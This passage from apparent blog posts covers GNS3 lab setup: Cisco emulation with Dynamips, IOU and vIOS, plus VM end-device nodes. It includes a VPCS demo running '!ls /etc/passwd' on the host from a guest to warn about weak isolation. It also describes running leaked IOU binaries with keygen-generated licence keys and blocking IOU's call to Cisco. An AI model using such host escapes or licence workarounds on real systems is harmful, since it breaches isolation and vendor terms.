graphics card, which takes over 3D computation to render faster
than the main general-purpose <span class="caps">CPU</span> could.</p>
<p><span class="lb-small"><a href="#real-gear.png" id="real-gear.png-thumb" title="Click to enlarge"><img alt="Cisco IOS-based devices stacks" src="https://www.whitewinterwolf.com/posts/2017/08/19/how-to-add-cisco-ios-based-devices-in-gns3/real-gear.png"/></a></span></p>
<p>Data processed at the hardware level does not involve the main <span class="caps">CPU</span> running <span class="caps">IOS</span>,
only the dedicated <span class="caps">ASIC</span>, and is handled faster, resulting in lower latency.
On the other hand, data processed at the software level allows more complex processing.</p>
<p>Most of the switching logic of Cisco Catalyst devices is implemented at the
hardware level.
Thus, emulating a Cisco Catalyst device to run its <span class="caps">IOS</span> images would imply
reverse-engineering and reimplementing most of the switch features.</p>
<p>Conversely, most of the logic of Cisco routers occurs at the software level as
part of the <span class="caps">IOS</span> firmware.
Emulating Cisco router hardware to run its <span class="caps">IOS</span> images is therefore easier
than emulating Cisco switches.</p>
<p>Dynamips, the Cisco device emulator used by <span class="caps">GNS3</span>, only emulates router
devices.
However, we will see some workarounds allowing you to still have some Cisco
switching features in your <span class="caps">GNS3</span> topologies.</p>
<h3 id="cisco-devices-virtualization-and-emulation"><a class="toclink" href="#cisco-devices-virtualization-and-emulation">Cisco devices virtualization and emulation</a></h3>
<p>There are several possibilities to add Cisco devices to your <span class="caps">GNS3</span> topologies,
some going through virtualization and others through emulation.
These two notions must not be confused in order to better understand the
advantages and limitations of each solution:</p>
<ul>
<li>
<p><em>Virtualization</em> software emulates the Cisco device hardware to execute
unmodified Cisco <span class="caps">IOS</span> firmware images.</p>
<p>This is slower and consumes more resources than emulation software, but
by running a genuine <span class="caps">IOS</span> it provides an experience closer to using a real
Cisco device.</p>
</li>
<li>
<p><em>Emulation</em> software emulates a whole Cisco device, including the <span class="caps">IOS</span>
operating system.</p>
<p>This is faster and more resource-efficient, but depending on the
fidelity of the emulation the final result may not have the same options
or behavior as real gear.</p>
</li>
</ul>
<h4 id="dynamips"><a class="toclink" href="#dynamips">Dynamips</a></h4>
<p>Dynamips is free software emulating Cisco router hardware, thus allowing you
to run unmodified <span class="caps">IOS</span> firmware images in a virtualized environment.</p>
<p>While Dynamips allows you to emulate a wide range of routers, two are of special
interest and are the most widely used: the c3725/c3745 and the c7200.</p>
<p>Any valid image for these devices is sufficient in most situations.
If, however, you require some specific features or would like more information
on the features offered by a given firmware image, you can freely check the
on-line <a href="http://www.cisco.com/go/fn" rel="external" title="Cisco Feature Navigator">Cisco Feature Navigator</a>.</p>
<h5 id="cisco-37253745-integrated-services-routers"><a class="toclink" href="#cisco-37253745-integrated-services-routers">Cisco 3725/3745 integrated services routers</a></h5>
<p>These routers accept Cisco EtherSwitch modules, adding some switching
ability to the router, and the good news is that Dynamips offers a basic but
stable emulation of these modules.</p>
<p>These devices are end-of-life now and only run <span class="caps">IOS</span> 12.x, but they are
very versatile as they can act not only as a router but also as a layer-2 or
layer-3 switch in your <span class="caps">GNS3</span> topology.</p>
<p>There are still a few differences between an EtherSwitch router module and an
actual Catalyst switch (note that these differences come from how the
EtherSwitch module itself works, not from Dynamips):</p>
<ul>
<li>Some commands are slightly different.
For instance, the <code>show vlan</code> command from Catalyst devices becomes
<code>show vlan-switch</code> on routers with the EtherSwitch module.</li>
<li><span class="caps">DTP</span> is not supported by the EtherSwitch module: no dynamic mode available
on the EtherSwitch ports and the command <code>switchport nonegotiate</code> is not available.</li>
<li>Only standard versions of the <span class="caps">STP</span> and EtherChannel protocols are available,
Cisco extensions are not available for these protocols.</li>
<li>No Gigabit port available (but it remains possible to “cheat” by setting
the bandwidth value manually without negative impact in a virtual topology).</li>
<li>The port-security feature is not available.</li>
</ul>
<p>The <span class="caps">GNS3</span> users forum hosts a more complete list of <a href="http://forum.gns3.net/topic229.html" rel="external" title="List of missing switching features in GNS3">missing features</a>.</p>
<p>As we will see below, some of these limitations can be solved by using
<a href="#iou"><span class="caps">IOU</span></a>.</p>
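<p>The following is an added example, not taken from the original article, showing the commands typed on a c3725 with its EtherSwitch module in slot 1 (hence the <code>FastEthernet1/x</code> ports) to create a VLAN, assign an access port and a static trunk, and verify them with the module-specific commands. The hostname, the VLAN number and name, and the chosen port numbers are assumptions made for this example.</p>

```text
! Added example (not from the original article); the hostname, VLAN 10 "LAB"
! and the port numbers are assumed for illustration.

! VLANs on the EtherSwitch module are created in the legacy "vlan database"
! mode rather than with the global "vlan <id>" command of Catalyst switches.
ESW1# vlan database
ESW1(vlan)# vlan 10 name LAB
ESW1(vlan)# exit

ESW1# configure terminal
! Access port for a lab host.
ESW1(config)# interface FastEthernet1/1
ESW1(config-if)# switchport mode access
ESW1(config-if)# switchport access vlan 10
ESW1(config-if)# exit
! Trunk toward another switch: there is no DTP on this module, so the mode is
! always static and the encapsulation must be set before "switchport mode trunk".
ESW1(config)# interface FastEthernet1/15
ESW1(config-if)# switchport trunk encapsulation dot1q
ESW1(config-if)# switchport mode trunk
ESW1(config-if)# end

! Verification: "show vlan" does not exist on the module, use "show vlan-switch".
ESW1# show vlan-switch brief
ESW1# show interfaces FastEthernet1/15 switchport
```

<p>Note that the VLANs created this way are stored in the <code>vlan.dat</code> file on the flash, not in the startup configuration, so saving the running configuration alone is not enough to preserve them.</p>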
<h5 id="cisco-7200-series-routers"><a class="toclink" href="#cisco-7200-series-routers">Cisco 7200 series routers</a></h5>
<p>These devices are more recent and can run <span class="caps">IOS</span> 15.x images.</p>
<p>They have no switching capability, but they remain useful when you want to
test some feature specific to <span class="caps">IOS</span> 15.x (for instance entry-level Cisco
certifications require students to be familiar with the new license management
features which came with <span class="caps">IOS</span> 15.0).</p>
<h5 id="finding-ios-firmware-images-for-dynamips"><a class="toclink" href="#finding-ios-firmware-images-for-dynamips">Finding <span class="caps">IOS</span> firmware images for Dynamips</a></h5>
<p><span class="caps">IOS</span> firmware images are proprietary software.
Their license forbids free redistribution (yes, even the old obsolete ones!).</p>
<ul>
<li>
<p>If your company is a Cisco Partner, then it should have access to Cisco’s
<span class="caps">IOS</span> firmware download pages.</p>
</li>
<li>
<p>Otherwise, you are expected to extract the firmware from a device you
bought (it can be a second-hand router, this doesn’t matter, as long as it
is the right model), copying its firmware image out as you would do to back
it up on a <span class="caps">TFTP</span> server.</p>
</li>
</ul>
<p>Alternatively, you can do as <a href="https://www.youtube.com/watch?v=VgoFXwb1QvI" rel="external" title="Building a Cisco CCNA Security Virtual Lab (YouTube)">Keith Barker</a> and do some
“snooping around” ;) .</p>
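<p>The backup procedure mentioned above, as an added example that is not part of the original article: typed on the router’s console, it lists the flash content, checks the image’s integrity and copies it to a <span class="caps">TFTP</span> server. The image file name and the server address are assumptions for this example; take the real name from the output of <code>show flash:</code> on your own device.</p>

```text
! Added example (not from the original article). The image file name and the
! 192.168.0.50 TFTP server address are assumed for illustration.
Router# show flash:

! Check the image before trusting it: the MD5 printed here must match the hash
! Cisco publishes for that exact image, and comparing it with the md5sum of the
! file received on the TFTP server tells you the copy was not truncated.
Router# verify /md5 flash:c3725-adventerprisek9-mz.124-15.T14.bin

! Plain TFTP: no authentication and no encryption, so do this on an isolated
! lab segment, not across a production network.
Router# copy flash:c3725-adventerprisek9-mz.124-15.T14.bin tftp:
Address or name of remote host []? 192.168.0.50
Destination filename [c3725-adventerprisek9-mz.124-15.T14.bin]?
```

<p>The file received on the <span class="caps">TFTP</span> server is the one to import in <span class="caps">GNS3</span> in the next section; keep the hash next to it so that a later copy can be checked the same way.</p>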
<h5 id="install-ios-firmware-images-in-gns3"><a class="toclink" href="#install-ios-firmware-images-in-gns3">Install <span class="caps">IOS</span> firmware images in <span class="caps">GNS3</span></a></h5>
<p>Installing an <span class="caps">IOS</span> firmware in <span class="caps">GNS3</span> requires several steps.
Most of them are shown during the first four minutes in <a href="https://www.youtube.com/watch?v=ubyZGXjUsjs" rel="external" title="MicroNugget: The ASA in GNS3 (YouTube)">this video</a>
by Anthony Sequeira (note that this video shows an older version of <span class="caps">GNS3</span>).</p>
<p>The complete procedure goes as follows:</p>
<ol>
<li>
<p>From the <span class="caps">GNS3</span> menu bar, go to <em>Edit</em> > <em>Preferences</em> to open the <em>Preferences</em> window.</p>
</li>
<li>
<p>On the left pane, go to <em>Dynamips</em> > <em><span class="caps">IOS</span> routers</em>, then click the <em>New</em> button.</p>
</li>
<li>
<p>Select your <span class="caps">IOS</span> image file location.
When asked, it is recommended to accept copying it into <span class="caps">GNS3</span>’s own directory tree.</p>
</li>
<li>
<p>With a sane image file, the device type should be automatically detected.</p>
<p>If the selected device supports EtherSwitch modules, a supplementary
checkbox labeled <em>This is an EtherSwitch router</em> becomes available.
This checkbox tells <span class="caps">GNS3</span> to consider this device more as a switch than
a router.</p>
<p>Ticking this box sets the following template properties:</p>
<ul>
<li>It adds by default an <span class="caps">NM</span>-16ESW EtherSwitch module in the first device
slot.
This is the only really important action, the other ones are merely cosmetic.</li>
<li>It enables the use of a specific startup script which sets the default
port configuration to better mimic that of a switch and sets a
specific hostname.</li>
<li>The device template is associated with the <em>Switches</em> category instead
of the <em>Routers</em> one.</li>
<li>The device icon is changed accordingly.</li>
</ul>
<p>Each of these settings can also be set later manually by right-clicking
on the device template to access the <em>Configure template</em> window.</p>
</li>
<li>
<p>Unless you have some specific needs, the <span class="caps">RAM</span> size and modules can be
left at their default values.</p>
</li>
<li>
<p>Now you need to determine a valid <em>Idle-<span class="caps">PC</span></em> value for your <span class="caps">IOS</span> image.
Simply click on the <em>Idle-<span class="caps">PC</span> finder</em> button and let <span class="caps">GNS3</span> do all the work.</p>
<ul>
<li>
<p>If the <em>Idle-<span class="caps">PC</span> finder</em> does not work, try it several times.
With some images it will work only on the second or third attempt.</p>
<p>If this still doesn’t work:</p>
<ul>
<li>Finish the procedure normally.</li>
<li>Add the newly created device to a new topology.</li>
<li>Start it, open its console (right-click > <em>Console</em>) and wait for
the end of the boot process, when the device is indeed idle and showing
its prompt.</li>
<li>Now right-click and select <em>Auto Idle-<span class="caps">PC</span></em>; this should work now.</li>
</ul>
</li>
<li>
<p>For the curious who wonder what this value means:</p>
<p>When Dynamips executes your <span class="caps">IOS</span> image code, at some point the
execution flow enters an infinite loop waiting for an event to happen
(an incoming packet on a network interface, a key pressed on the console, etc.).
This infinite loop makes Dynamips consume 100% of a host <span class="caps">CPU</span> core.</p>
<p>The solution is to determine the address of an instruction within the
firmware corresponding to this loop (and nothing else).
This address is called the <em>Idle-<span class="caps">PC</span></em>: it is a value of the Program Counter
allowing Dynamips to recognize when the device is in the idle state.</p>
<p>As we will see later, the Dynamips process will regularly pause for
some milliseconds when the <span class="caps">IOS</span> execution flow passes through this
instruction, thus reducing the <span class="caps">CPU</span> consumption to a reasonable value.</p>
</li>
</ul>
</li>
<li>
<p>Click on the <em>Finish</em> button to create the template.</p>
</li>
<li>
<p>The default idle settings are very conservative.
When using relatively large topologies, Dynamips will still consume a
noticeable amount of <span class="caps">CPU</span> even while idle.</p>
<ul>
<li>
<p>Right-click on your newly created device template and click
<em>Configure Template</em>.</p>
</li>
<li>
<p>Below the <em>Advanced</em> tab you will find the previously determined
<em>Idle-<span class="caps">PC</span></em> accompanied by <em>Idlemax</em> and <em>Idlesleep</em> values.</p>
<p>To reduce the host <span class="caps">CPU</span> consumption, the Dynamips process counts the number
of times the <span class="caps">IOS</span> firmware instruction at the <em>Idle-<span class="caps">PC</span></em> address is
executed; each time this count reaches <em>Idlemax</em>, the Dynamips process
sleeps for <em>Idlesleep</em> milliseconds.</p>
<p>The default value for <em>Idlemax</em> is 500, meaning that Dynamips sleeps
every 500 executions of the instruction at the <em>Idle-<span class="caps">PC</span></em> address.</p>
<p>Setting <em>Idlemax</em> to 100 reduces Dynamips <span class="caps">CPU</span> consumption
even further with no noticeable side effect.</p>
</li>
</ul>
</li>
</ol>
<h4 id="iou"><a class="toclink" href="#iou"><span class="caps">IOU</span></a></h4>
<p><span class="caps">IOU</span> stands for <span class="caps">IOS</span> on Unix.
This is a Cisco device emulator, allegedly initially designed to run on SunOS
systems and later ported to other platforms such as Linux.</p>
<p>This was initially an internal project within Cisco, not designed to be
distributed or even discussed outside of the circle of Cisco employees.
If you are not a Cisco employee, you may not be authorized to use this software.</p>
<p>Nevertheless, an experimental version of this software leaked outside of Cisco
offices.
While being experimental and having its own serious issues, it is still an
interesting alternative solving some of Dynamips-based <span class="caps">IOS</span> virtualization issues.</p>
<div class="admonition warning">
<p class="admonition-title">Warning</p>
<p>Unlike <span class="caps">IOS</span> firmware images, which run in a virtualized environment controlled by
the Dynamips process, <span class="caps">IOU</span> binaries are native executable files which run
directly on your host environment.</p>
<p>In other words: they are executable programs.</p>
<p>Should you be tempted to search for and download <span class="caps">IOU</span> binaries from untrusted,
shady sources, keep in mind that they may embed malware
targeting your host and/or your network.</p>
</div>
<p>Several <span class="caps">IOU</span> binaries are available, emulating various options but more
importantly emulating devices acting at the layer 2 (switching) or the layer 3
(routing).
Layer 3 is well covered by Dynamips, however <span class="caps">IOU</span> is a really interesting
alternative to test some layer 2 functionalities not available when using Dynamips.</p>
<p>Advantages of <span class="caps">IOU</span> compared to Dynamips-based virtualization:</p>
<ul>
<li>This is the lightest and fastest option available to emulate Cisco devices.</li>
<li>Port-security is functional (note though that while real gear <span class="caps">CAM</span> size is
limited to a few thousand entries, on <span class="caps">IOU</span> it can host tens of millions of
addresses, making <span class="caps">MAC</span>-flooding tests impractical).</li>
<li>EtherChannel is functional.</li>
<li><span class="caps">STP</span> options are available, but are severely broken and nearly unusable.</li>
</ul>
<p>Disadvantages of <span class="caps">IOU</span>:</p>
<ul>
<li>This is not a real <span class="caps">IOS</span>, so several options and behaviors may differ
from real gear (see the <span class="caps">CAM</span> table size for instance).</li>
<li>While available, the Spanning Tree Protocol (<span class="caps">STP</span>) is severely broken.
The election process works correctly, but if there is a loop in your
topology (which is precisely what this protocol is meant to handle)
any broadcast systematically results in a broadcast storm with a very high
<span class="caps">CPU</span> consumption.
The <span class="caps">CPU</span> consumption immediately gets back to normal as soon as the loop is
broken (by disabling an interface through <span class="caps">IOS</span> for instance).</li>
<li>According to various sources, QoS is not functional either.</li>
<li>Chances are that several other things are missing or broken (impossible
for instance to set a port speed).</li>
</ul>
<p>If you want to learn more about <span class="caps">IOU</span>, the reference on the subject is
<a href="http://evilrouters.net/cisco-iou-faq" rel="external" title="Cisco IOU FAQ (evil routers)">Evil Router’s <span class="caps">FAQ</span></a>.
More background information is available on <a href="http://freeccnalabs.com/cisco-iou/" rel="external" title="Cisco IOU (freeCCNAlabs)">Free <span class="caps">CCNA</span> labs</a>, another
blog maintained by the same author.</p>
<h5 id="install-iou-in-gns3"><a class="toclink" href="#install-iou-in-gns3">Install <span class="caps">IOU</span> in <span class="caps">GNS3</span></a></h5>
<p>I am using Debian on a 64 bit architecture, depending on your system and host
architecture the exact steps you need to follow may vary.</p>
<ol>
<li>
<p><span class="caps">IOU</span> is a 32-bit executable file.
To use it on a 64-bit environment, you need to enable the 32-bit (i386)
architecture in your package sources to install the <span class="caps">GNS3</span> module in charge of
handling <span class="caps">IOU</span> images and all required libraries:</p>
<div class="codehilite"><pre>sudo dpkg --add-architecture i386
sudo apt-get update
sudo apt-get install gns3-iou
sudo ln -s /usr/lib/i386-linux-gnu/libcrypto.so.1.0.0 /usr/lib/libcrypto.so.4
</pre></div>
</li>
<li>
<p><span class="caps">IOU</span> attempts to contact the host <em>xml.cisco.com</em> on startup. To disable
this, edit your <em>/etc/hosts</em> file and map this name to a black-hole
loopback address:</p>
<div class="codehilite"><pre>127.99.99.99 xml.cisco.com
</pre></div>
</li>
<li>
<p>You usually also need a license key to run <span class="caps">IOU</span>; this key is calculated from
your hostname and <span class="caps">IP</span> address.
Usually a key generator (<code>keygen.py</code>) is provided with the <span class="caps">IOU</span> binaries
to generate the appropriate key file.</p>
</li>
<li>
<p>In <span class="caps">GNS3</span>, don’t forget to specify the location of your license key file
in the general <em><span class="caps">IOS</span> on <span class="caps">UNIX</span></em> section from the <em>Preferences</em> screen.</p>
</li>
<li>
<p>Then go to <em><span class="caps">IOU</span> devices</em> and click <em>New</em>; the rest should be straightforward.</p>
</li>
</ol>
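<p>The <em>/etc/hosts</em> step above can be scripted. The following is an added example, not code from the original post: it writes the black-hole entry only if the name is not already mapped, refuses to silently overwrite an existing mapping to a different address, and then checks that whatever the file now resolves the name to is a loopback address, so the entry can never send the notification somewhere reachable. The function names, the <code>HOSTS_FILE</code>, <code>BLACKHOLE_NAME</code> and <code>BLACKHOLE_ADDR</code> variables and the <code>blackhole.sh</code> file name are assumptions made here; the address 127.99.99.99 is the one used in the post.</p>

```shell
#!/bin/sh
# Added example (not from the original post): pin xml.cisco.com to a loopback
# black-hole address in a hosts file, idempotently, and verify the result.
# HOSTS_FILE, BLACKHOLE_NAME, BLACKHOLE_ADDR and the function names are
# assumptions made for this example; 127.99.99.99 is the address the post uses.

# hosts_lookup FILE NAME: print the address the first uncommented line maps
# NAME to, or nothing if NAME has no entry.
hosts_lookup() {
    awk -v name="$2" '
        $1 !~ /^#/ { for (i = 2; i <= NF; i++) if ($i == name) { print $1; exit } }
    ' "$1"
}

# add_blackhole FILE NAME ADDR: append "ADDR NAME" unless NAME already has an
# entry.  Returns 0 when NAME maps to ADDR afterwards, 1 if NAME is already
# mapped to a different address (left untouched for the operator to review).
add_blackhole() {
    file="$1"; name="$2"; addr="$3"
    current=$(hosts_lookup "$file" "$name")
    if [ -z "$current" ]; then
        printf '%s %s\n' "$addr" "$name" >> "$file"
    elif [ "$current" != "$addr" ]; then
        printf '%s already maps to %s in %s, not changed\n' "$name" "$current" "$file" >&2
        return 1
    fi
    return 0
}

# is_loopback ADDR: succeed only for 127.0.0.0/8, i.e. an address that can
# never leave the host.
is_loopback() {
    case "$1" in
        127.*) return 0 ;;
        *)     return 1 ;;
    esac
}

main() {
    file="${HOSTS_FILE:-/etc/hosts}"
    name="${BLACKHOLE_NAME:-xml.cisco.com}"
    addr="${BLACKHOLE_ADDR:-127.99.99.99}"
    add_blackhole "$file" "$name" "$addr" || exit 1
    resolved=$(hosts_lookup "$file" "$name")
    if ! is_loopback "$resolved"; then
        printf '%s resolves to %s, which is not a loopback address\n' "$name" "$resolved" >&2
        exit 1
    fi
    printf '%s -> %s (black-holed)\n' "$name" "$resolved"
}

# Run main only when executed as blackhole.sh, so the functions can be sourced.
case "$0" in
    blackhole.sh|*/blackhole.sh) main ;;
esac
```

<p>Run <code>sudo sh blackhole.sh</code> to edit <em>/etc/hosts</em>, or set <code>HOSTS_FILE</code> to a copy of it to try the script first. It only proves what the hosts file says; it does not observe whether the binary actually honours the resolver, so watching the lab host's outbound traffic once after the change remains the real check.</p>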
<h4 id="vios"><a class="toclink" href="#vios">vIOS</a></h4>
<p>My personal guess is that <span class="caps">IOU</span> is an early development snapshot of what later
became vIOS, once <a href="http://brezular.com/2014/07/16/cisco-virtual-ios-on-gns3/" rel="external" title="Cisco Virtual IOS on GNS3 (Brezular)">freely downloadable</a> from Cisco's website as part of
their <span class="caps">SDK</span>, Cisco’s One Platform Kit (onePK), and later replaced by the paid
<a href="/posts/2017/08/11/how-to-build-a-virtual-pentest-lab/#virl" title="How to build a virtual lab: VIRL"><span class="caps">VIRL</span></a> virtualization platform, which is not freely downloadable anymore.</p>
<p>vIOS usually presents itself as a virtual machine image hosting <span class="caps">IOS</span>.
It is very similar in form and behavior to <span class="caps">IOU</span>; there are images
available for layers 2 and 3, but the layer 2 ones are the most useful (<span class="caps">IMHO</span>).</p>
<p>Compared to <span class="caps">IOU</span>, the fact that it does not run natively on the host raises
some limitations:</p>
<ul>
<li>It consumes more resources than <span class="caps">IOU</span>, even if under some conditions it <em>may</em>
remain more efficient than Dynamips images, but I’m not even sure about this.</li>
<li>As with any <span class="caps">VM</span>-based image, <span class="caps">GNS3</span> does not allow modifying its network links
while the <span class="caps">VM</span> is running.
Although this is usually not a problem with real end-devices nodes such as
workstations and servers, having to shutdown and restart half of your
switches each time you want to change your topology seems like a major
drawback to me.</li>
</ul>
<p>The advantage compared to <span class="caps">IOU</span>:</p>
<ul>
<li><span class="caps">STP</span> is fixed.</li>
</ul>
<p>I know, this is very short, that’s why I usually prefer to use <span class="caps">IOU</span> over vIOS.</p>
<p>Maybe there is a way to extract the emulated <span class="caps">IOS</span> from the virtual machine image.
Due to the low benefits I did not do any research in this area, but this
would allow getting the best of both worlds.</p>
How to add virtual machines (end devices nodes) in GNS3 2017-08-14T00:00:00+02:00 2017-09-25T00:00:00+02:00 WhiteWinterWolf tag:www.whitewinterwolf.com,2017-08-14:/posts/2017/08/14/gns3-how-to-add-virtual-machines-end-devices-nodes/
<p>Virtual machines can be added in <span class="caps">GNS3</span> topologies as end devices nodes and can
play various roles:</p>
<ul>
<li>
<p>Lightweight ones are very focused, for instance providing just enough to
test network connectivity or a functional browser.</p>
<p>They start blazingly fast and are very light on resources, meaning you can
put several of them to test end-user workstation behavior at several places
in your topology with little to no worry about the <span class="caps">CPU</span> or memory impact.</p>
</li>
<li>
<p>Dedicated appliances are designed to provide a specific service, like
networking (firewall, …), applicative (proxy, email filtering, …)
or administrative (monitoring, …) services.</p>
<p>Resource consumption varies greatly depending on the service and the software
used by the appliance.
However, professional appliances are usually designed to handle a large
number of simultaneous operations: some will run with no issue when the
virtual machine's resource settings are reduced for test environments,
some may require a modification in their settings, like reducing a cache
size, and some may simply not support running with lower resources.</p>
</li>
<li>
<p>Full-fledged virtual machines could be just anything, from a server system
to an end-user workstation, from an infrastructure system to a home computer, etc.</p>
</li>
</ul>
<div class="admonition warning">
<p class="admonition-title">Warning</p>
<p>When adding end device nodes to your <span class="caps">GNS3</span> topologies, don’t confuse
<a href="https://wiki.freecode.com.cn/doku.php?id=wiki:vpcs" rel="external" title="Virtual PC Simulator project homepage"><span class="caps">VPCS</span></a> nodes with actual virtual machine nodes.</p>
<p>While virtual machines offer a reasonable level of isolation between the
guest and the host systems, <span class="caps">VPCS</span> does not even attempt to provide such
isolation, as executing a command on the host from a <span class="caps">VPCS</span> guest is as
simple as prefixing it with a <code>!</code>:</p>
<div class="codehilite"><pre><span class="go">PC1> !ls /etc/passwd</span>
<span class="go">/etc/passwd</span>
<span class="go">PC1></span>
</pre></div>
<p>If you want a <span class="caps">GNS3</span> topology to be isolated from the host system and the
physical network, don’t use <span class="caps">VPCS</span> nodes but use lightweight virtual machines instead.</p>
</div>
<h3 id="ready-made-systems"><a class="toclink" href="#ready-made-systems">Ready-made systems</a></h3>
<h4 id="gns3-appliances"><a class="toclink" href="#gns3-appliances"><span class="caps">GNS3</span> appliances</a></h4>
<p><span class="caps">GNS3</span> provides a centralized place to search for pre-configured <span class="caps">GNS3</span> nodes:
the <a href="https://community.gns3.com/marketplace/" rel="external" title="GNS3 marketplace"><span class="caps">GNS3</span> marketplace</a>.</p>
<p>It provides:</p>
<ul>
<li>
<p><em>Appliances</em>: these are mostly network-related and bare-bone free Unix systems.</p>
<p>They can be a good alternative to manual configuration to install Cisco
images (as long as you have one of the exact firmware images expected by
the appliance template), but usually this is not really needed.</p>
<p>Regarding the free Unix systems, I usually prefer to install them myself,
but I suppose it may still help sometimes.</p>
<p>The real jewel here is the <em>Firefox</em> appliance, a Qemu virtual machine
maintained by the <span class="caps">GNS3</span> team and relying on TinyCore Linux, which provides
a very lightweight (256 <span class="caps">MB</span> of <span class="caps">RAM</span> for the complete virtual machine) yet
complete Firefox to simulate end users in your topologies.
This is just a must-have.</p>
</li>
<li>
<p><em>Software</em>: this is… everything else.
It includes software stacks, monitoring platforms, utilities and specialized platforms.</p>
<p>It notably includes a template for Kali Linux, but last time I checked
it was an old version and, as with other general purpose systems,
I find it more practical to simply install it myself than to tinker with
someone else’s work.</p>
</li>
<li>
<p><em>Learning material</em>: The marketplace is not only the place for topology
node templates, it also provides a large number of learning resources
contributed by the community.</p>
<p>I did not try any of these, but their advantage compared to other available
resources is that the trainer usually provides ready-made <span class="caps">GNS3</span> topologies
to work with the course.</p>
</li>
</ul>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>Appliance and software templates are just plain text files, not archive
files, and they do not contain any virtual machine.
They only store the <span class="caps">GNS3</span> node settings and either:</p>
<ul>
<li>A <span class="caps">URL</span> to fetch the free virtual machines (from <a href="https://sourceforge.net/projects/gns-3/files/Qemu%20Appliances/" rel="external" title="GNS3 repository: Qemu Appliances (SourceForge)">here</a> for
appliances maintained by the <span class="caps">GNS3</span> team).</li>
<li>A filename and a hash, used to ask you for a firmware or an installation
disc image and to check that you provided the right file.</li>
</ul>
</div>
<p>When installing a Qemu-based template, you may need to review its settings.
In particular:</p>
<ul>
<li>
<p>If you are not using the <span class="caps">US</span> keyboard, you will have to specify your keyboard
mapping explicitly.</p>
<p>Go in the <em>Advanced settings</em> tab, section <em>Additional settings</em>, and add
the additional Qemu parameters matching your keyboard (for instance <code>-k fr</code>
for a French keyboard).</p>
<p>Qemu usually stores available keyboard mapping files under the
<em>/usr/share/qemu/keymaps</em> directory.</p>
</li>
<li>
<p>If the template uses a single virtual <span class="caps">CPU</span> by default, add a second one.</p>
<p>Most virtual machines work better with two vCPUs, and as long as you are
using dedicated hardware for your virtual lab (which
<a href="/posts/2017/08/11/how-to-build-a-virtual-pentest-lab/" title="How to build a virtual lab">I advise you to do</a>) you should have enough resources to
support this.</p>
</li>
</ul>
<h4 id="standalone-virtual-machines"><a class="toclink" href="#standalone-virtual-machines">Standalone virtual machines</a></h4>
<p>While the <span class="caps">GNS3</span> images maintained directly by the <span class="caps">GNS3</span> project team are
high-quality, the quality of the content provided by third parties varies widely.</p>
<p>Third-party appliance and software templates often require outdated and
hard-to-find firmware or installation images.
While sometimes you can force the template to accept a file by removing
or modifying the hash stored in the template file, often it is just easier
and safer to simply manually create your own nodes.</p>
<p>A quick alternative to <span class="caps">GNS3</span> appliances is using standalone virtual machines.
To find ready-made virtual images, check my dedicated post:
<a href="/posts/2017/08/14/where-to-find-virtual-machines-and-iso-files/" title="Where to find virtual machines and ISO files?">Where to find virtual machines and <span class="caps">ISO</span> files?</a></p>
<p>To import a virtual machine, from the <span class="caps">GNS3</span> menu bar go in <em>Edit</em> > <em>Preferences</em>.
The left pane of the <em>Preferences</em> window should offer you, among other
topics, the <em>Qemu VMs</em>, <em>VirtualBox VMs</em> and <em>VMware VMs</em> entries, allowing you to
create new <span class="caps">GNS3</span> end device nodes by importing the selected virtual machine.</p>
<p><span class="lb-small"><a href="#new.png" id="new.png-thumb" title="Click to enlarge"><img alt="Screenshot: import a virtual machine" src="https://www.whitewinterwolf.com/posts/2017/08/14/gns3-how-to-add-virtual-machines-end-devices-nodes/new.png"/></a></span></p>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>All things being equal, I personally prefer to use Qemu virtual
machines as they are more flexible and reliable thanks to better support
of linked base VMs (see below), offer more configuration options, and
access to the guest console is more user-friendly (no need to keep its
window permanently open).</p>
</div>
<div class="admonition note">
<p class="admonition-title"><span class="caps">GNS3</span> bug</p>
<p><span class="caps">GNS3</span> currently suffers from some bugs (<a href="https://github.com/GNS3/gns3-gui/issues/2239" rel="external" title="GNS3 issue #2239: Generating hashes of large images crashes the server and screws-up the GUI (GitHub)">#2239</a>, <a href="https://github.com/GNS3/gns3-gui/issues/2314" rel="external" title="GNS3 issue #2314: Generating snapshots containing large images crashes the server and screws-up the GUI (GitHub)">#2314</a>)
which may crash the <span class="caps">GNS3</span> server when adding a large virtual disk image
to it.</p>
<p>The workaround is to manually create a snapshot file like this:</p>
<div class="codehilite"><pre>qemu-img create -f qcow2 -o backing_file=original-file.qcow2 snapshot-file.qcow2
</pre></div>
<p>Then provide the snapshot file to <span class="caps">GNS3</span> instead of the large, original <span class="caps">HDD</span> image file.</p>
</div>
<h5 id="linked-base-vms"><a class="toclink" href="#linked-base-vms">Linked base VMs</a></h5>
<p>Linked base VMs is a feature natively supported by Qemu, but its support by
<span class="caps">GNS3</span> for VMware and VirtualBox is still experimental.</p>
<h6 id="linked-based-vms-disabled"><a class="toclink" href="#linked-based-vms-disabled">Linked based VMs disabled</a></h6>
<p>When this feature is not used, adding a virtual machine to a topology makes
the <span class="caps">GNS3</span> project use this virtual machine's <span class="caps">HDD</span> image directly.</p>
<p><span class="lb-small"><a href="#lbs-disabled.png" id="lbs-disabled.png-thumb" title="Click to enlarge"><img alt="Linked based VMs disabled" src="https://www.whitewinterwolf.com/posts/2017/08/14/gns3-how-to-add-virtual-machines-end-devices-nodes/lbs-disabled.png"/></a></span></p>
<p>This raises several limitations:</p>
<ul>
<li>
<p>Any modification made to the virtual machine from within the topology
(meaning any disk access or file modification) affects the created virtual
machine itself.</p>
<p>Deleting and re-adding the node in your topology won’t rollback anything.</p>
</li>
<li>
<p>The virtual machine you added in your topology and the virtual machine in
the <em>End devices</em> menu are the same entity.</p>
<p>Any modification to the virtual machine in one topology affects every
other topology using the same end device node.</p>
</li>
<li>
<p>Such end device nodes can be imported only once in a topology.</p>
<p>For instance you cannot simulate two workstations by adding the same
virtual machine twice.</p>
</li>
</ul>
<p>Several of these limitations come from the fact that several nodes cannot
simultaneously access the same virtual machine <span class="caps">HDD</span> image.</p>
<p>The common but quite inefficient workaround for this situation is to manually
create several copies of the same virtual machine, one for each node and for
each topology, and import every copy as an individual end device node in <span class="caps">GNS3</span>.</p>
<p>A cleaner solution is to use linked base VMs.</p>
<h6 id="linked-based-vms-enabled"><a class="toclink" href="#linked-based-vms-enabled">Linked based VMs enabled</a></h6>
<p>When this feature is used, <span class="caps">GNS3</span> won’t directly access the created virtual
machines anymore; instead it will generate a snapshot and store it inside the
<span class="caps">GNS3</span> project directory.
Such a snapshot acts as an intermediary layer over the <span class="caps">VM</span> virtual <span class="caps">HDD</span>: unmodified
